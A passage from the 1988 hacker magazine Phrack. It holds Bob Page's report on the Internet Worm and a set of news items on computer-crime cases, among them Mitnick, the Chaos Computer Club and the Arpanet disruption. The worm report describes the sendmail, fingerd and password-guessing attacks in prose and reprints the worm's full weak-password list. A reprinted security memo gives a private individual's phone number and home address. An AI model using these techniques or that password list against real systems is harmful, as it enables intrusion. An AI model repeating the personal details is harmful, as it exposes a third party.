Computer Crime. New York: Charles Scribner's Sons. Pful, Erdwin H. 1987. "Computer abuse: problems of instrumental control. Deviant Behavior 8: 113-130. Scott, Michael D. 1984. Computer Law. New York: John Wiley and Sons. Shea, Tom. 1984. "The FBI goes after hackers," Infoworld 6 (13): 38,39,41,43,44. Taber, John K. 1980. "A survey of computer crime studies," Computer/Law Journal 2: 275-327. Time. 1983a. "Playing games," (August 22): 14. --1983b. "The 414 gang strikes again," (August 29): 75. --1986. "Surveying the data diddlers," (February 17): 95. Underwood, John. 1979. "Win, place... and sting," Sports Illustrated 51 (July 23): 54-81+. U.S. Public Law 98-473. 1984. Counterfeit Access Device and Computer Fraud and Abuse Act of 1984. Amendment to Chapter 47 of Title 18 of the United States Code, (October 12). U.S. Public Law 99-474. 1986. Computer Fraud and Abuse Act of 1986. Amendment to Chapter 47 of Title 18 of the United States Code, (October 16). _______________________________________________________________________________ ========================================================================= ==Phrack Inc.== Volume Two, Issue 22, File 8 of 12 "]}`"`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\ \`\`\ \`\`\ \`\ A Report On The InterNet Worm \`\ \`\ \`\ \`\ By Bob Page \`\ \`\ \`\ \`\ University of Lowell \`\ \`\ Computer Science Department \`\ \`\ \`\ \`\ November 7, 1988 \`\ \`\`\ \`\`\ \`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\ Here's the truth about the "Internet Worm." Actually it's not a virus - a virus is a piece of code that adds itself to other programs, including operating systems. It cannot run independently, but rather requires that its "host" program be run to activate it. As such, it has a clear analog to biologic viruses -- those viruses are not considered live, but they invade host cells and take them over, making them produce new viruses. A worm is a program that can run by itself and can propagate a fully working version of itself to other machines. As such, what was loosed on the Internet was clearly a worm. This data was collected through an emergency mailing list set up by Gene Spafford at Purdue University, for administrators of major Internet sites - some of the text is included verbatim from that list. The basic object of the worm is to get a shell on another machine so it can reproduce further. There are three ways it attacks: sendmail, fingerd, and rsh/rexec. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - The Sendmail Attack: In the sendmail attack, the worm opens a TCP connection to another machine's sendmail (the SMTP port), invokes debug mode, and sends a RCPT TO that requests its data be piped through a shell. That data, a shell script (first-stage bootstrap) creates a temporary second-stage bootstrap file called x$$,l1.c (where '$$' is the current process ID). This is a small (40-line) C program. The first-stage bootstrap compiles this program with the local cc and executes it with arguments giving the Internet hostid/socket/password of where it just came from. The second-stage bootstrap (the compiled C program) sucks over two object files, x$$,vax.o and x$$,sun3.o from the attacking host. It has an array for 20 file names (presumably for 20 different machines), but only two (vax and sun) were compiled in to this code. It then figures out whether it's running under BSD or SunOS and links the appropriate file against the C library to produce an executable program called /usr/tmp/sh - so it looks like the Bourne shell to anyone who looked there. The Fingerd Attack: In the fingerd attack, it tries to infiltrate systems via a bug in fingerd, the finger daemon. Apparently this is where most of its success was (not in sendmail, as was originally reported). When fingerd is connected to, it reads its arguments from a pipe, but doesn't limit how much it reads. If it reads more than the internal 512-byte buffer allowed, it writes past the end of its stack. After the stack is a command to be executed ("/usr/ucb/finger") that actually does the work. On a VAX, the worm knew how much further from the stack it had to clobber to get to this command, which it replaced with the command "/bin/sh" (the bourne shell). So instead of the finger command being executed, a shell was started with no arguments. Since this is run in the context of the finger daemon, stdin and stdout are connected to the network socket, and all the files were sucked over just like the shell that sendmail provided. The Rsh/Rexec Attack: The third way it tried to get into systems was via the .rhosts and /etc/hosts.equiv files to determine 'trusted' hosts where it might be able to migrate to. To use the .rhosts feature, it needed to actually get into people's accounts - since the worm was not running as root (it was running as daemon) it had to figure out people's passwords. To do this, it went through the /etc/passwd file, trying to guess passwords. It tried combinations of: the username, the last, first, last+first, nick names (from the GECOS field), and a list of special "popular" passwords: aaa cornelius guntis noxious simon academia couscous hacker nutrition simple aerobics creation hamlet nyquist singer airplane creosote handily oceanography single albany cretin happening ocelot smile albatross daemon harmony olivetti smiles albert dancer harold olivia smooch alex daniel harvey oracle smother alexander danny hebrides orca snatch algebra dave heinlein orwell snoopy aliases december hello osiris soap alphabet defoe help outlaw socrates ama deluge herbert oxford sossina amorphous desperate hiawatha pacific sparrows analog develop hibernia painless spit anchor dieter honey pakistan spring andromache digital horse pam springer animals discovery horus papers squires answer disney hutchins password strangle anthropogenic dog imbroglio patricia stratford anvils drought imperial penguin stuttgart anything duncan include peoria subway aria eager ingres percolate success ariadne easier inna persimmon summer arrow edges innocuous persona super arthur edinburgh irishman pete superstage athena edwin isis peter support atmosphere edwina japan philip supported aztecs egghead jessica phoenix surfer azure eiderdown jester pierre suzanne bacchus eileen jixian pizza swearer bailey einstein johnny plover symmetry banana elephant joseph plymouth tangerine bananas elizabeth joshua polynomial tape bandit ellen judith pondering target banks emerald juggle pork tarragon barber engine julia poster taylor baritone engineer kathleen praise telephone bass enterprise kermit precious temptation bassoon enzyme kernel prelude thailand batman ersatz kirkland prince tiger beater establish knight princeton toggle beauty estate ladle protect tomato beethoven euclid lambda protozoa topography beloved evelyn lamination pumpkin tortoise benz extension larkin puneet toyota beowulf fairway larry puppet trails berkeley felicia lazarus rabbit trivial berliner fender lebesgue rachmaninoff trombone beryl fermat lee rainbow tubas beverly fidelity leland raindrop tuttle bicameral finite leroy raleigh umesh bob fishers lewis random unhappy brenda flakes light rascal unicorn brian float lisa really unknown bridget flower louis rebecca urchin broadway flowers lynne remote utility bumbling foolproof macintosh rick vasant burgess football mack ripple vertigo campanile foresight maggot robotics vicky cantor format magic rochester village cardinal forsythe malcolm rolex virginia carmen fourier mark romano warren carolina fred markus ronald water caroline friend marty rosebud weenie cascades frighten marvin rosemary whatnot castle fun master roses whiting cat fungible maurice ruben whitney cayuga gabriel mellon rules will celtics gardner merlin ruth william cerulean garfield mets sal williamsburg change gauss michael saxon willie charles george michelle scamper winston charming gertrude mike scheme wisconsin charon ginger minimum scott wizard chester glacier minsky scotty wombat cigar gnu moguls secret woodwind classic golfer moose sensor wormwood clusters gorgeous morley serenity yaco coffee gorges mozart sharks yang coke gosling nancy sharon yellowstone collins gouge napoleon sheffield yosemite commrades graham nepenthe sheldon zap computer gryphon ness shiva zimmerman condo guest network shivers cookie guitar newton shuttle cooper gumption next signature When everything else fails, it opens /usr/dict/words and tries every word in the dictionary. It is pretty successful in finding passwords, as most people don't choose them very well. Once it gets into someone's account, it looks for a .rhosts file and does an 'rsh' and/or 'rexec' to another host, it sucks over the necessary files into /usr/tmp and runs /usr/tmp/sh to start all over again. Between these three methods of attack (sendmail, fingerd, .rhosts) it was able to spread very quickly. The Worm Itself: The 'sh' program is the actual worm. When it starts up it clobbers its argv array so a 'ps' will not show its name. It opens all its necessary files, then unlinks (deletes) them so they can't be found (since it has them open, however, it can still access the contents). It then tries to infect as many other hosts as possible - when it sucessfully connects to one host, it forks a child to continue the infection while the parent keeps on trying new hosts. One of the things it does before it attacks a host is connect to the telnet port and immediately close it. Thus, "telnetd: ttloop: peer died" in /usr/adm/messages means the worm attempted an attack. The worm's role in life is to reproduce - nothing more. To do that it needs to find other hosts. It does a 'netstat -r -n' to find local routes to other hosts & networks, looks in /etc/hosts, and uses the yellow pages distributed hosts file if it's available. Any time it finds a host, it tries to infect it through one of the three methods, see above. Once it finds a local network (like 129.63.nn.nn for ulowell) it sequentially tries every address in that range. If the system crashes or is rebooted, most system boot procedures clear /tmp and /usr/tmp as a matter of course, erasing any evidence. However, sendmail log files show mail coming in from user /dev/null for user /bin/sed, which is a tipoff that the worm entered. Each time the worm is started, there is a 1/15 chance (it calls random()) that it sends a single byte to on some magic port, apparently to act as some kind of monitoring mechanism. The Crackdown: Three main 'swat' teams from Berkeley, MIT and Purdue found copies of the VAX code (the .o files had all the symbols intact with somewhat meaningful names) and disassembled it into about 3000 lines of C. The BSD development team poked fun at the code, even going so far to point out bugs in the code and supplying source patches for it! They have not released the actual source code, however, and refuse to do so. That could change - there are a number of people who want to see the code. Portions of the code appear incomplete, as if the program development was not yet finished. For example, it knows the offset needed to break the BSD fingerd, but doesn't know the correct offset for Sun's fingerd (which causes it to dump core); it also doesn't erase its tracks as cleverly as it might; and so on. The worm uses a variable called 'pleasequit' but doesn't correctly initialize it, so some folks added a module called _worm.o to the C library, which is produced from: int pleasequit = -1; the fact that this value is set to -1 will cause it to exit after one iteration. The close scrutiny of the code also turned up comments on the programmer's style. Verbatim from someone at MIT: From disassembling the code, it looks like the programmer is really anally retentive about checking return codes, and, in addition, prefers to use array indexing instead of pointers to walk through arrays. Anyone who looks at the binary will not see any embedded strings - they are XOR'ed with 81 (hex). That's how the shell commands are imbedded. The "obvious" passwords are stored with their high bit set. Although it spreads very fast, it is somewhat slowed down by the fact that it drives the load average up on the machine - this is due to all the encryptions going on, and the large number of incoming worms from other machines. [Initially, the fastest defense against the worm is is to create a directory called /usr/tmp/sh. The script that creates /usr/tmp/sh from one of the .o files checks to see if /usr/tmp/sh exists, but not to see if it's a directory. This fix is known as 'the condom'.] Now What? Most Internet systems running 4.3BSD or SunOS have installed the necessary patches to close the holes and have rejoined the Internet. As you would expect, there is a renewed interest in system/network security, finding and plugging holes, and speculation over what will happen to the worm's creator. If you haven't read or watched the news, various log files have named the responsible person as Robert Morris Jr., a 23-year old doctoral student at Cornell. His father is head of the National Computer Security Center, the NSA's public effort in computer security, and has lectured widely on security aspects of UNIX. Associates of the student claim the worm was a 'mistake' - that he intended to unleash it but it was not supposed to move so quickly or spread so much. His goal was to have a program 'live' within the Internet. If the reports that he intended it to spread slowly are true, then it's possible that the bytes sent to were intended to monitor the spread of the worm. Some news reports mentioned that he panicked when, via some "monitoring mechanism" he saw how fast it had propagated. A source inside DEC reports that although the worm didn't make much progress there, it was sighted on several machines that wouldn't be on its normal propagation path, i.e. not gateways and not on the same subnet. These machines are not reachable from the outside. Morris was a summer intern at DEC in '87. He might have included names or addresses he remembered as targets for infesting hidden internal networks. Most of the DEC machines in question belong to the group he worked in. The final word has not been written... will be interesting to see what happens. _______________________________________________________________________________ ========================================================================= ==Phrack Inc.== Volume Two, Issue 22, File 9 of 12 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN P h r a c k W o r l d N e w s PWN PWN ~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~ PWN PWN Issue XXII/Part 1 PWN PWN PWN PWN Created by Knight Lightning PWN PWN PWN PWN Written and Edited by PWN PWN Knight Lightning and Taran King PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN What Is Wrong With This Issue? Introduction ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There is a distinct difference in this issue of Phrack World News, which may be attributed to the unfortunate final outcome of my self-enforced exile from the mainstream modem community. In the "prime" days of PWN, many of you may have enjoyed the numerous "bust" stories or the ever suspenseful undercover exposures of security trying to end the hacking community. Those days are over and have been for quite some time. To put it simply, I do not have the economic resources to legally run around on the nation's bulletin boards or to go and gather information on suspected security agents. Perhaps this is for the better. However, I have a feeling that most people disagree and rather enjoyed those types of stories. Its no longer in my hands. Its obvious that I need help with such a task and that help can only come from you, the community itself. I am easily reached... I am on Bitnet. Even people who own MCI Mail, GTE Telemail, or Compuserve accounts can send me mail thanks to experimental gateways. People on ARPAnet, Bitnet, or UUCP should have no problems whatsoever. So please go ahead and drop me a line, I would be interested in what you have to say. :Knight Lightning (C483307@UMCVMB.BITNET) Much of this issue of Phrack World News comes from Internet news sources such as the Risks, Virus-L, and Telecom Digests. Some news stories come from other magazines and newspapers, and a few come from Chamas, the online Bitnet bulletin board run by Terra of the Chaos Computer Club (CCC). A very special thanks goes to The Noid of 314 for all his help in putting this issue together. A couple last things to mention... the upcoming files on hackers abroad have taken a slightly different direction. There will be news on foreign hacker activities presented in PWN (starting this issue), but actual files on the subject will be presented by the hackers themselves so watch for them. _______________________________________________________________________________ Who Is Clifford Stoll? Pre-Issue Information ~~~~~~~~~~~~~~~~~~~~~~ This issue of Phrack World News features many stories about the Internet Worm and other hacking incidents on the Internet. One person who plays a prominent role in all of these stories is Clifford Stoll, a virtual unknown prior to these incidents. However, some checking into other related incidents turned up some very interesting information about Cliff Stoll. Clifford Stoll, age 37 (as of May 2, 1988) was a system's manager at California's Lawrence Berkeley Laboratory. He might still retain this position. Stoll is the master sleuth who tracked down the West German hacker, Mathias Speer, who infiltrated the Internet via the Space Physics Analysis Network (SPAN). The game of "cat and mouse" lasted for 10 months until Clifford Stoll eventually set up an elaborate sting operation using files marked "SDI Network Project" (Star Wars) to get Mathias to stay online long enough to trace him back to Hannover, FRG. I was able to contact Clifford Stoll at LBL (which maintains a node on Bitnet). However, outside of a confirmation of his presence, I was never able to really converse with him. Recently he has been seen on DOCKMASTER, a node on ARPAnet that is operated by the National Security Agency (NSA). He has also been seen as having accounts on many other nodes all across Internet. Either he has come a long way or was just not as well known prior to the Internet Worm incident. For more information see; Time Magazine, May 2, 1988 and/or New Scientist, April 28, 1988 ------------- ------------- Thought you might be interested to know about it. :Knight Lightning _______________________________________________________________________________ Dangerous Hacker Is Captured PWN Special Report ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Last issue, I re-presented some memos from Pacific Bell Security. The first of which featured "Kevin Hacker," who I now reveal as Kevin Mitnick. The original intent was to protect the anonyimity of the said hacker, but now that he has come upon public fame there is no longer a reason to keep his identity a secret. The following memo from Pacific Bell Security was originally seen in Phrack World News Issue XXI/1. This version leaves the legitimate information intact. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - On May 14, 1987, Electronic Operations received a court order directing Pacific Bell to place traps on the telephone numbers assigned to a company known as "Santa Cruz Operations." The court order was issued in order to identify the telephone number being used by an individual who was illegally entering Santa Cruz Operations' computer and stealing information. On May 28, 1987, a telephone number was identified five separate times making illegal entry into Santa Cruz Operations' computer. The originating telephone number was 805-495-6191, which is listed to Bonnie Vitello, 1378 E. Hillcrest Drive, Apt. 404, Thousand Oaks, California. On June 3, 1987, a search warrant was served at 1378 E. Hillcrest Drive, Apt 404, Thousand Oaks, California. The residents of the apartment, who were not at home, were identified as Bonnie Vitello, a programmer for General Telephone, and Kevin Mitnick, a known computer hacker. Found inside the apartment were three computers, numerous floppy disks and a number of General Telephone computer manuals. Kevin Mitnick was arrested several years ago for hacking Pacific Bell, UCLA and Hughes Aircraft Company computers. Mitnick was a minor at the time of his arrest. Kevin Mitnick was recently arrested for compromising the data base of Santa Cruz Operations. The floppy disks that were seized pursuant to the search warrant revealed Mitnick's involvment in compromising the Pacific Bell UNIX operation systems and other data bases. The disks documented the following: o Mitnick's compromise of all Southern California SCC/ESAC computers. On file were the names, log-ins, passwords, and home telephone numbers for Northern and Southern ESAC employees. o The dial-up numbers and circuit identification documents for SCC computers and Data Kits. o The commands for testing and seizing trunk testing lines and channels. o The commands and log-ins for COSMOS wire centers for Northern and Southern California. o The commands for line monitoring and the seizure of dial tone. o References to the impersonation of Southern California Security Agents and ESAC employees to obtain information. o The commands for placing terminating and originating traps. o The addresses of Pacific Bell locations and the Electronic Door Lock access codes for the following Southern California central offices ELSG12, LSAN06, LSAN12, LSAN15, LSAN23, LSAN56, AVLN11, HLWD01, HWTH01, IGWD01, LOMT11, AND SNPD01. o Inter-company Electronic Mail detailing new login/password procedures and safeguards. o The work sheet of an UNIX encryption reader hacker file. If successful, this program could break into any UNIX system at will. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Ex-Computer Whiz Kid Held On New Fraud Counts December 16, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Kim Murphy (Los Angeles Times)(Edited For This Presentation) Kevin Mitnick was 17 when he first cracked Pacific Bell's computer system, secretly channeling his computer through a pay phone to alter telephone bills, penetrate other computers and steal $200,000 worth of data from a San Francisco corporation. A Juvenile Court judge at the time sentenced Mitnick to six months in a youth facility. After his release, his probation officer found that her phone had been disconnected and the phone company had no record of it. A judge's credit record at TRW Inc. was inexplicably altered. Police computer files on the case were accessed from outside... Mitnick fled to Israel. Upon his return, there were new charges filed in Santa Cruz, accusing Mitnick of stealing software under development by Microport Systems, and federal prosecutors have a judgment showing Mitnick was convicted on the charge. There is, however, no record of the conviction in Sant Cruz's computer files. On Thursday, Mitnick, now 25, was charged in two new criminal complaints accusing him of causing $4 million damage to a DEC computer, stealing a highly secret computer security system and gaining access to unauthorized MCI long-distance codes through university computers in Los Angeles, California, and England. A United States Magistrate took the unusual step of ordering "Mitnic k] held without bail, ruling that when armed with a keyboard he posed a danger to the community.' "This thing is so massive, we're just running around trying to figure out what he did," said the prosecutor, an Assistant United States Attorney. "This person, we believe, is very, very dangerous, and he needs to be detained and kept away from a computer." Los Angeles Police Department and FBI Investigators say they are only now beginning to put together a picture of Mitnick and his alleged high-tech escapades. "He's several levels above what you would characterize as a computer hacker," said Detective James K. Black, head of the Los Angeles Police Department's computer crime unit. "He started out with a real driving curiosity for computers that went beyond personal computers... He grew with the technology." Mitnick is to be arraigned on two counts of computer fraud. The case is believed to be the first in the nation under a federal law that makes it a crime to gain access to an interstate computer network for criminal purposes. Federal prosecutors also obtained a court order restricting Mitnick's telephone calls from jail, fearing he might gain access to a computer over the phone lines. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Dangerous Keyboard Artist December 20, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~ LOS ANGELES (UPI) - In a rare ruling, a convicted computer hacker was ordered held without bail Thursday on new charges that he gained illegal access to secret computer information of Leeds University in England and Digital Equipment Corportation. Kevin David Mitnick, age 25, of Panorama City, is named in two separate criminal complaints charging him with computer fraud. Assistant United States Attorney, Leon Weidman said it is unusual to seek detention in such cases, but he considers Mitnick 'very very dangerous' and someone who 'needs to be kept away from computers.' United States Magistrate Venetta Tasnuopulos granted the no-bail order after Weidman told her that since 1982, Mitnick had also accessed the internal records of the Los Angeles Police Department, TRW Corporation, and Pacific Telephone. "He could call up and get access to the whole world," Weidman said. Weidman said Mitnick had served six months in juvenile hall for stealing computer manuals from a Pacific Telephone office in the San Fernando Valley and using a pay phone to destroy $200,000 worth of data in the files of a northern California company. Mitnick later pentrated the files of TRW Corporation and altered the credit information of several people, including his probation officer, Weidman said. He said Mitnick also used a ruse to obtain the name of the police detective investigating him for hacking when he was a student at Pierce College. He telephoned the dean at 3 a.m., identified himself as a campus security guard, reported a computer burglary in progress and asked for the name of the detective investigating past episodes, Weidman said. The prosecutor said Mitnick also gained access to the police department's computer data and has impersonated police officers and judges to gain information. A complaint issued charges Mitnick with using a computer in suburban Calabases to gain access to Leeds University computer data in England. He also allegedly altered long-distance phone costs incurred by that activity in order to cover his mischief. A second complaint charges Mitnick with stealing proprietary Digital Equipment Corporation software valued at more than $1 million and designed to protect the security of its computer data. Mitnick alledgedly stored the stolen data in a University of Southern California computer. An affidavit filed to support the complaints said unauthorized intrusions into the Digital computer have cost the company more than $4 million in computer downtime, file rebuilding, and lost employee worktime. A computer operator at Voluntary Plan Assistance in Calabasas, which handles disability claims for private firms, told investigators he allowed his friend unauthorized access to the firm's computer. From that terminal, Mitnick gained access to Digital's facilities in the United States and abroad, the affidavit said. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Kevin Mitnick's fate is in the hand's of the court now, but only time will tell what is to happen to this dangerously awesome computer hacker. _______________________________________________________________________________ Trojan Horse Threat Succeeds February 10, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ During the week prior to February 10, 1988, the Chaos Computer Club of West Berlin announced that they were going to trigger trojan horses they'd previously planted on various computers in the Space Physics Analysis Network (SPAN). Presumably, the reason for triggering the trojan horses was to throw the network into disarray; if so, the threat did, unfortunately, with the help of numerous fifth-columnists within SPAN, succeeded. Before anybody within SPAN replies by saying something to the effect of "Nonsense, they didn't succeed in triggering any trojan horses." However the THREAT succeeded. That's right, for the last week SPAN hasn't been functioning very well as a network. All too many of the machines in it have cut off network communications (or at least lost much of their connectivity), specifically in order to avoid the possibility that the trojan horses would be triggered (the fifth-columnists who were referred above are those system and network managers who were thrown into panic by the threat). This is rather amazing (not to mention appalling) for a number of reasons: 1) By reducing networking activities, SPAN demonstrated that the CCC DOES have the power to disrupt the network (even if there aren't really any trojan horses out there); 2) Since the break-ins that would have permitted the installation of trojan horses, there have been a VMS release (v4.6) that entails replacement of ALL DEC-supplied images. Installation of the new version of VMS provided a perfect opportunity to purge one's system of any trojan horses. 3) In addition to giving CCC's claims credibility, SPAN's response to the threat seems a bit foolish since it leaves open the question "What happens if the CCC activates trojan horses without first holding a press conference?" Hiding from the problem doesn't help in any way, it merely makes SPAN (and NASA) look foolish. Information Provided By Carl J. Ludick and Frederick M. Korz - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - This is a perfect example of a self-fulfilling phrophecy. The Chaos Computer Club's announcement that they were going to trigger their Trojan horses in the Space Physics Analysis Network (SPAN) illustrates the potent power of rumor -- backed by plausibility. They didn't have to do anything. The sky didn't have to fall. Nervous managers did the damage for the CCC because they felt the announcement/threat plausible. The prophecy was fulfilled. "And the more the power to them!" :Knight Lightning _______________________________________________________________________________ TCA Pushes For Privacy On Corporate Networks October 19, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Kathy Chin Leong (Computerworld Magazine) SAN DIEGO -- As more and more confidential data winds its way across computer networks, users are expressing alarm over how much of that information is safe from subsidiaries of the Bell operating companies (BOCs) and long-distance firms providing transmission services. This fear has prompted the Tele-Communications Association (TCA) and large network users to appeal to the Federal Communications Commission to clarify exactly what network data is available to these vendors. Users with large networks, such as banks and insurance companies, are concerned that published details even of where a circuit is routed can be misused. "We don't what someone like AT&T to use our information and then turn around and compete against us," said Leland Fong, a network planner at Visa International in San Francisco. Users are demanding that the FCC establish a set of rules and regulations so that information is not abused. At issue is the term "customer proprietary network information" (CPNI), which encompasses packet data, address and circuit information and traffic statistics on networks. Under the FCC's Computer Inquiry III rules, long-distance carriers and Bell operating companies --- specifically, marketing personnel --- can get access to their own customers' CPNI unless users request confidentiality. What his group wants, TCA President Jerry Appleby said, is the FCC to clarify exactly what falls under the category of CPNI. Fong added that users can be at the mercy of the Bell operating companies and long-distance vendors if there are no safeguards established. Customer information such as calling patterns can be used by the operating companies for thier own competitive advantage. "At this time, there are no controls over CPNI, and the users need to see some action on this," Fong said. Spread The Concern At a meeting here during the TCA show, TCA officials and the association's government liason committee met with AT&T to discuss the issue; the group will also voice its concerns to other vendors. Appleby said the issue should not be of concern just to network managers but to the entire company. Earlier this month, several banks, including Chase Manhattan Bank and Security Pacific National Bank, and credit card companies met with the FCC to urge it to come up with a standard definition for CPNI, Appleby said. While the customer information is generally confidential, it is available to the transmission carrier that is supplying the line. The data is also available to marketing departments of that vendor unless a company asks for confidentiality. Fong said that there is no regulation that prevents a company from passing the data along to its subsidiaries. _______________________________________________________________________________ Belgian Leader's Mail Reportedly Read By Hacker October 22, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Taken from the Los Angeles Times Brussels (AP) -- Belgian Prime Minister Wilfried Martens on Friday ordered an investigation into reports that a computer hacker rummaged through his electronic files and those of other Cabinet members. The newspaper De Standaard reported that a man, using a personal computer, for three months viewed Martens' electronic mail and other items, including classified information about the killing of a British soldier by the Irish Republican Army in Ostend in August. The newspaper said the man showed one of its reporters this week how he broke into the computer, using Martens' password code of nine letters, ciphers and punctuation marks. "What is more, during the demonstration, he ran into another 'burglar' ... with whom he briefly conversed" via computer, the newspaper said. _______________________________________________________________________________ Police Find Hacker Who Broke Into 200 Computers October 24, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ London (New York Times) - Police said yesterday that they had found and questioned a 23-year-old man who used computer networks to break into more than 200 military, corporate, and university systems in Europe and the United States during the past five years. The man was asked about an alleged attempt to blackmail a computer manufacturer, but an official for Scotland Yard said that there was not enough evidence to pursue the matter. He was released. The man, Edward Austin Singh, who is unemployed, reportedly told the police he had been in contact with other computer "hackers" in the United States and West Germany who use communications networks to penetrate the security protecting computers at military installations. Singh's motive was simply to prove that it was possible to break into the military systems, police said, and apparently he did not attempt espionage. London police began an investigation after the man approached a computer manufacturer. He allegedly asked the company for $5250 in exchange for telling it how he had entered its computer network. The company paid nothing, and London police tracked the suspect by monitoring his phone calls after the firm had told Scotland Yard about the incident. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - University of Surrey Hacker November 10, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ There has been a lot of recent publicity in the U.K. about the arrest of a hacker at the University of Surrey. There were stories about his investigation by Scotland Yard's Serious Crimes Squad and by the U.S. Secret Service, and much dicussion about the inadequacy of the law relating to network hacking. At this date, he has only been charged with offences relating his unathorised (physical) entry to the University buildings. An interview with the individual, Edward Austin Singh, reveals that his techniques were simply ased on a program which tricked users into unsuspectingly revealing their passwords. "I wrote a program that utilized a flaw that allowed me to call into the dial-up node. I always did it by phoning, never by the network. The dial-up node has to have an address as well, so I was calling the address itself. I called the dial-up node via the network and did it repeatedly until it connected. That happened every 30 seconds. It allowed me to connect the dial-up node at the same time as a legitimate user at random. I would then emulate the system." He used to run this program at night, and specialized in breaking into Prime computer systems. "I picked up about 40 passwords and IDs an hour. We were picking up military stuff like that, as well as commercial and academic," he claims. This enabled him to get information from more than 250 systems world-wide, and (he claims) in touich with an underground hackers network to "access virtually every single computer system which was networked in the US - thousands and thousands of them, many of them US Arms manufacturers." The article states that "Prime Computers have so far declined to comment on his approach to them or his alleged penetration of their computer systems, until the American Secret Service completes its inquiries." Information Provided By Brian Randell _______________________________________________________________________________ ========================================================================= ==Phrack Inc.== Volume Two, Issue 22, File 10 of 12 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN P h r a c k W o r l d N e w s PWN PWN ~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~ PWN PWN Issue XXII/Part 2 PWN PWN PWN PWN Created by Knight Lightning PWN PWN PWN PWN Written and Edited by PWN PWN Knight Lightning and Taran King PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Computer Network Disrupted By "Virus" November 3, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By John Markoff (New York Times) In an intrusion that raises new questions about the vulnerability of the nation's computers, a nationwide Department of Defense data network has been disrupted since Wednesday night by a rapidly spreading "virus" software program apparently introduced by a computer science student's malicious experiment. The program reproduced itself through the computer network, making hundreds of copies in each machine it reached, effectively clogging systems linking thousands of military, corporate and university computers around the country and preventing them from doing additional work. The virus is thought not to have destroyed any files. By late Thursday afternoon computer security experts were calling the virus the largest assault ever on the nation's computers. "The big issue is that a relatively benign software program can virtually bring our computing community to its knees and keep it there for some time," said Chuck Cole, deputy computer security manager at Lawerence Livermore Laboratory in Livermore, Calif., one of the sites affected by the intrusion. "The cost is going to be staggering." Clifford Stoll, a computer security expert at Harvard University, added, "There is not one system manager who is not tearing his hair out. It's causing enormous headaches." The affected computers carry routine communications among military officials, researchers and corporations. While some sensitive military data are involved, the nation's most sensitive secret information, such as that on the control of nuclear weapons, is thought not to have been touched by the virus. Computer viruses are so named because they parallel in the computer world the behavior of biological viruses. A virus is a program, or a set of instructions to a computer, that is deliberately planted on a floppy disk meant to be used with the computer or introduced when the computer is communicating over telephone lines or data networks with other computers. The programs can copy themselves into the computer's master software, or operating system, usually without calling any attention to themselves. From there, the program can be passed to additional computers. Depending upon the intent of the software's creator, the program might cause a provocative but otherwise harmless message to appear on the computer's screen. Or it could systematically destroy data in the computer's memory. The virus program was apparently the result of an experiment by a computer science graduate student trying to sneak what he thought was a harmless virus into the Arpanet computer network, which is used by universities, military contractors and the Pentagon, where the software program would remain undetected. A man who said he was an associate of the student said in a telephone call to The New York Times that the experiment went awry because of a small programming mistake that caused the virus to multiply around the military network hundreds of times faster than had been planned. The caller, who refused to identify himself or the programmer, said the student realized his error shortly after letting the program loose and that he was now terrified of the consequences. A spokesman at the Pentagon's Defense Communications Agency, which has set up an emergency center to deal with the problem, said the caller's story was a "plausible explanation of the events." As the virus spread Wednesday night, computer experts began a huge struggle to eradicate the invader. A spokesman for the Defense Communications Agency in Washington acknowledged the attack, saying, "A virus has been identified in several host computers attached to the Arpanet and the unclassified portion of the defense data network known as the Milnet." He said that corrections to the security flaws exploited by the virus are now being developed. The Arpanet data communications network was established in 1969 and is designed to permit computer researchers to share electronic messages, programs and data such as project information, budget projections and research results. In 1983 the network was split and the second network, called Milnet, was reserved for higher-security military communications. But Milnet is thought not to handle the most classified military information, including data related to the control of nuclear weapons. The Arpanet and Milnet networks are connected to hundreds of civilian networks that link computers around the globe. There were reports of the virus at hundreds of locations on both coasts, including, on the East Coast, computers at the Massachusetts Institute of Technology, Harvard University, the Naval Research Laboratory in Maryland and the University of Maryland and, on the West Coast, NASA's Ames Research Center in Mountain View, Calif.; Lawrence Livermore Laboratories; Stanford University; SRI International in Menlo Park, Calif.; the University of California's Berkeley and San Diego campuses and the Naval Ocean Systems Command in San Diego. A spokesman at the Naval Ocean Systems Command said that its computer systems had been attacked Wednesday evening and that the virus had disabled many of the systems by overloading them. He said that computer programs at the facility were still working on the problem more than 19 hours after the original incident. The unidentified caller said the Arpanet virus was intended simply to "live" secretly in the Arpanet network by slowly copying itself from computer to computer. However, because the designer did not completely understand how the network worked, it quickly copied itself thousands of times from machine to machine. Computer experts who disassembled the program said that it was written with remarkable skill and that it exploited three security flaws in the Arpanet network. [No. Actually UNIX] The virus' design included a program designed to steal passwords, then masquerade as a legitimate user to copy itself to a remote machine. 